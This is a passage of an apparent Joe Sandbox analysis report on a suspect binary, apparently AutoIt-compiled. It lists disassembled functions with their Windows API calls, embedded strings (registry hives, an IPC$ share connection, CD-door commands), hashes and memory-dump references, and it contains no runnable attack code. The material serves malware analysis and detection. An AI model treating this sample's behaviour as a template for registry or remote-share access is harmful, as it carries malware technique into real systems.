                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: SendString$BuffCharDriveLowerType__itow_memmove
                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                        • API String ID: 1157065533-4113822522
                                                                        • Opcode ID: c6456753c6c1fc74f2ca5629c99a806a4e773aeea8f225ed105ebca95f4fb23b
                                                                        • Instruction ID: efac152987757c0a7fd881d0367be4adb7441b852c25819a6263ca1fa60ac612
                                                                        • Opcode Fuzzy Hash: c6456753c6c1fc74f2ca5629c99a806a4e773aeea8f225ed105ebca95f4fb23b
                                                                        • Instruction Fuzzy Hash: 84514B711143059FCB04EF28C89196FB7E4FF98728F14886DF89A97261DB71AD09CB52
                                                                        Function 0091BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0091BA56
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0091BA6D
                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0091BA78
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0091BA85
                                                                        • GlobalLock.KERNEL32(00000000), ref: 0091BA8E
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0091BA9D
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0091BAA6
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0091BAAD
                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0091BABE
                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00922CAC,?), ref: 0091BAD7
                                                                        • GlobalFree.KERNEL32(00000000), ref: 0091BAE7
                                                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 0091BB0B
                                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0091BB36
                                                                        • DeleteObject.GDI32(00000000), ref: 0091BB5E
                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0091BB74
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                        • String ID:
                                                                        • API String ID: 3840717409-0
                                                                        • Opcode ID: 34fcbaab7c45d1903bebf73c8a9eeb514f49407af909f515c3b66b182a6fe3d2
                                                                        • Instruction ID: 8ca63294a18e0daa84d859029360fd55551b1c5f87c27f207ede501e3fe4fc3d
                                                                        • Opcode Fuzzy Hash: 34fcbaab7c45d1903bebf73c8a9eeb514f49407af909f515c3b66b182a6fe3d2
                                                                        • Instruction Fuzzy Hash: 5D413475604208FFDB119F65DC98EEABBB9EF89711F108068F91AD7260D7309A41EB60
                                                                        Function 008FD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __wsplitpath.LIBCMT ref: 008FDA10
                                                                        • _wcscat.LIBCMT ref: 008FDA28
                                                                        • _wcscat.LIBCMT ref: 008FDA3A
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008FDA4F
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008FDA63
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 008FDA7B
                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 008FDA95
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008FDAA7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                        • String ID: *.*
                                                                        • API String ID: 34673085-438819550
                                                                        • Opcode ID: 7dfdd073b875f81b9c5360550ad39540d36457a3d74bae4c6b64e36305dd61e8
                                                                        • Instruction ID: 8773e309ad92527367eea184df136319a7c49e16b8bf6cfc6ec7a79bd222d5d1
                                                                        • Opcode Fuzzy Hash: 7dfdd073b875f81b9c5360550ad39540d36457a3d74bae4c6b64e36305dd61e8
                                                                        • Instruction Fuzzy Hash: 7681B5726043099FCB20EF78C8449BABBE5FF89354F18882EF689C7251E670D945CB52
                                                                        Function 0091C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00892612: GetWindowLongW.USER32(?,000000EB), ref: 00892623
                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0091C1FC
                                                                        • GetFocus.USER32 ref: 0091C20C
                                                                        • GetDlgCtrlID.USER32(00000000), ref: 0091C217
                                                                        • _memset.LIBCMT ref: 0091C342
                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0091C36D
                                                                        • GetMenuItemCount.USER32(?), ref: 0091C38D
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 0091C3A0
                                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0091C3D4
                                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0091C41C
                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0091C454
                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?), ref: 0091C489
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                        • String ID: 0
                                                                        • API String ID: 1296962147-4108050209
                                                                        • Opcode ID: dd650232dffabff0edc1d9ee1743528a4642d91401ca564103747c9ee878282c
                                                                        • Instruction ID: 7aaa4a854a93e35372a6541281787bfb8de0d739b20ed51524069ee053404a73
                                                                        • Opcode Fuzzy Hash: dd650232dffabff0edc1d9ee1743528a4642d91401ca564103747c9ee878282c
                                                                        • Instruction Fuzzy Hash: 8381AEB0348319AFD710CF14C894ABBBBE9FB88754F00492DF995972A1D730D985DB92
                                                                        Function 0090731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 0090738F
                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0090739B
                                                                        • CreateCompatibleDC.GDI32(?), ref: 009073A7
                                                                        • SelectObject.GDI32(00000000,?), ref: 009073B4
                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00907408
                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00907444
                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00907468
                                                                        • SelectObject.GDI32(00000006,?), ref: 00907470
                                                                        • DeleteObject.GDI32(?), ref: 00907479
                                                                        • DeleteDC.GDI32(00000006), ref: 00907480
                                                                        • ReleaseDC.USER32(00000000,?), ref: 0090748B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                        • String ID: (
                                                                        • API String ID: 2598888154-3887548279
                                                                        • Opcode ID: c1df930d4325f7532a66a0d9c17b002fb1c1605db6b5fd13898aa6006c52138b
                                                                        • Instruction ID: ca72508f22df64e51a69b4797c75b853cf9ff78646dcba9d262f814cd9d7f904
                                                                        • Opcode Fuzzy Hash: c1df930d4325f7532a66a0d9c17b002fb1c1605db6b5fd13898aa6006c52138b
                                                                        • Instruction Fuzzy Hash: 4A514875A04309EFDB14CFA8DC84EAEBBB9EF48310F14842DF95A97251C731A940DB60
                                                                        Function 008C8249 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 143fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __close_nolock.LIBCMT ref: 008C8214
                                                                        • __lseeki64_nolock.LIBCMT ref: 008C8256
                                                                        • CloseHandle.KERNEL32(00000040,?,?,?,?,?,00000000,00000109), ref: 008C851A
                                                                        • ___createFile.LIBCMT ref: 008C8539
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008C8546
                                                                        • __dosmaperr.LIBCMT ref: 008C854D
                                                                        • __free_osfhnd.LIBCMT ref: 008C856D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CloseErrorFileHandleLast___create__close_nolock__dosmaperr__free_osfhnd__lseeki64_nolock
                                                                        • String ID: t"=$t"=$t)=$t)=$tD=
                                                                        • API String ID: 1689960631-2384938829
                                                                        • Opcode ID: 5af305fa35bf5155720ace05f06eaf4d21624452f487d61b87a1a79e1e434939
                                                                        • Instruction ID: b0fae25e28330f5eb2190c949c7a7ac6ffff885dd4cb0a3d05cd37190ddf5b58
                                                                        • Opcode Fuzzy Hash: 5af305fa35bf5155720ace05f06eaf4d21624452f487d61b87a1a79e1e434939
                                                                        • Instruction Fuzzy Hash: C0514472950516CBEB298B18E895FBA7B31FB01354F2C422DE961E72A1CB35CC90D745
                                                                        Function 00896A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008B0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00896B0C,?,00008000), ref: 008B0973
                                                                          • Part of subcall function 00894750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00894743,?,?,?,0089715A,?,?,?,?,0089108C), ref: 00894770
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00896BAD
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00896CFA
                                                                          • Part of subcall function 0089586D: _wcscpy.LIBCMT ref: 008958A5
                                                                          • Part of subcall function 008B363D: _iswctype.LIBCMT ref: 008B3645
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                        • API String ID: 537147316-1018226102
                                                                        • Opcode ID: 478caa10c033b010e13051edf6269768c7f3b52e9eb6caebb1ca4091ee85f6ff
                                                                        • Instruction ID: 3068a9a3b3206b1ad1510b496616d6654f7b43c763641fc9849d5da02999da8d
                                                                        • Opcode Fuzzy Hash: 478caa10c033b010e13051edf6269768c7f3b52e9eb6caebb1ca4091ee85f6ff
                                                                        • Instruction Fuzzy Hash: 7A0257301083449BCB25EF28C891AAFBBE5FF95318F18492DF496D72A1DA30D949CB53
                                                                        Function 008F2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008F2D50
                                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 008F2DDD
                                                                        • GetMenuItemCount.USER32(00955890), ref: 008F2E66
                                                                        • DeleteMenu.USER32(00955890,00000005,00000000,000000F5,?,?), ref: 008F2EF6
                                                                        • DeleteMenu.USER32(00955890,00000004,00000000), ref: 008F2EFE
                                                                        • DeleteMenu.USER32(00955890,00000006,00000000), ref: 008F2F06
                                                                        • DeleteMenu.USER32(00955890,00000003,00000000), ref: 008F2F0E
                                                                        • GetMenuItemCount.USER32(00955890), ref: 008F2F16
                                                                        • SetMenuItemInfoW.USER32(00955890,00000004,00000000,00000030), ref: 008F2F4C
                                                                        • GetCursorPos.USER32(?), ref: 008F2F56
                                                                        • SetForegroundWindow.USER32(00000000), ref: 008F2F5F
                                                                        • TrackPopupMenuEx.USER32(00955890,00000000,?,00000000,00000000,00000000), ref: 008F2F72
                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008F2F7E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                        • String ID:
                                                                        • API String ID: 3993528054-0
                                                                        • Opcode ID: 46a4ba62ad77b479fcfc4ff9a981f4ff111e6efebf68f393761cffb1f5e7bcbb
                                                                        • Instruction ID: 680d77d3e7ddb3e7f6ffb6d54cb0966859ce7b79528eeb0585db296ac41cac18
                                                                        • Opcode Fuzzy Hash: 46a4ba62ad77b479fcfc4ff9a981f4ff111e6efebf68f393761cffb1f5e7bcbb
                                                                        • Instruction Fuzzy Hash: 8271C17060420DBEEB219F68DC45FBABF65FB04364F244216F725EA1E2C7716860DBA1
                                                                        Function 008F9C38 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 150COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 008F9C7F
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 008F9CA0
                                                                        • _wprintf.LIBCMT ref: 008F9DB9
                                                                        • _wprintf.LIBCMT ref: 008F9DD7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: LoadString_wprintf$_memmove
                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 3536794898-3080491070
                                                                        • Opcode ID: d6019d2b71744f7049802a4d1eef055ce19921b55bb8194e96e9fd3290e2e02d
                                                                        • Instruction ID: c572387240dcbe871664a1ca5e8757fe8c09ce32c8697395e5467b3955eb4ffe
                                                                        • Opcode Fuzzy Hash: d6019d2b71744f7049802a4d1eef055ce19921b55bb8194e96e9fd3290e2e02d
                                                                        • Instruction Fuzzy Hash: 35518C31900609AACF15FBE8DD46EEEBB78FF14304F640065F505B21A2EB312E58DB62
                                                                        Function 008E77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                        • _memset.LIBCMT ref: 008E786B
                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008E78A0
                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008E78BC
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008E78D8
                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 008E7902
                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 008E792A
                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008E7935
                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008E793A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                        • API String ID: 1411258926-22481851
                                                                        • Opcode ID: 0af0c057ddf5deb5834eecc8dec18e2dda958c917205cb003e5d33acbcb79418
                                                                        • Instruction ID: c3e4483e8e058c16cace559ea49ad152d10c054d0458fa49f3839c13941e438d
                                                                        • Opcode Fuzzy Hash: 0af0c057ddf5deb5834eecc8dec18e2dda958c917205cb003e5d33acbcb79418
                                                                        • Instruction Fuzzy Hash: 9641F57282422DABDF25EBA8DC95DEDB778FF18314F444469E906A2161EB309E04CB91
                                                                        Function 00910E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0090FDAD,?,?), ref: 00910E31
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                        • API String ID: 3964851224-909552448
                                                                        • Opcode ID: 12453afadbc73ebccd18843046b8182e0f4ffa577c889a16cc29808c9e05a4ad
                                                                        • Instruction ID: f59b5c57c91f7de0dedaa689c779916ffbac76a130de70dcf7366586ac416768
                                                                        • Opcode Fuzzy Hash: 12453afadbc73ebccd18843046b8182e0f4ffa577c889a16cc29808c9e05a4ad
                                                                        • Instruction Fuzzy Hash: 4C418C3121035A8BCF20EF14D952AEF37A4FF51304F640815FC659B392DB75999ACB61
                                                                        Function 008F52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                          • Part of subcall function 00897924: _memmove.LIBCMT ref: 008979AD
                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008F5330
                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008F5346
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008F5357
                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 008F5369
                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 008F537A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: SendString$_memmove
                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                        • API String ID: 2279737902-1007645807
                                                                        • Opcode ID: 3c794bef9e4f3e3fc27aebde6833ea17daa2a4829bd0d25f277f39a17911068e
                                                                        • Instruction ID: 35e9ebf8ed3cd3a3461983332b30d8e3e737d86556e98f54291d704f1dfbad50
                                                                        • Opcode Fuzzy Hash: 3c794bef9e4f3e3fc27aebde6833ea17daa2a4829bd0d25f277f39a17911068e
                                                                        • Instruction Fuzzy Hash: 2C116031AA412D79DB64B679DC5ADFFAABCFBD2B48F040429B511E21D1EEA00904C5A1
                                                                        Function 008F46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                        • String ID: 0.0.0.0
                                                                        • API String ID: 208665112-3771769585
                                                                        • Opcode ID: 5a73860803676375016a98f9d4ace2ca83d0928e4d34d6235be34def3bfce43f
                                                                        • Instruction ID: 702018efef40a7ae7976d368ae9e9aa8657fd5b453ee75cde355643ed8e4dab7
                                                                        • Opcode Fuzzy Hash: 5a73860803676375016a98f9d4ace2ca83d0928e4d34d6235be34def3bfce43f
                                                                        • Instruction Fuzzy Hash: 1511C33160411C6FCB10BB349C4AEEB77BCFB41711F1441B6F546D6191EB719A81DA51
                                                                        Function 008F4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • timeGetTime.WINMM ref: 008F4F7A
                                                                          • Part of subcall function 008B049F: timeGetTime.WINMM(00955310,7694B400,008A0E7B), ref: 008B04A3
                                                                        • Sleep.KERNEL32(0000000A), ref: 008F4FA6
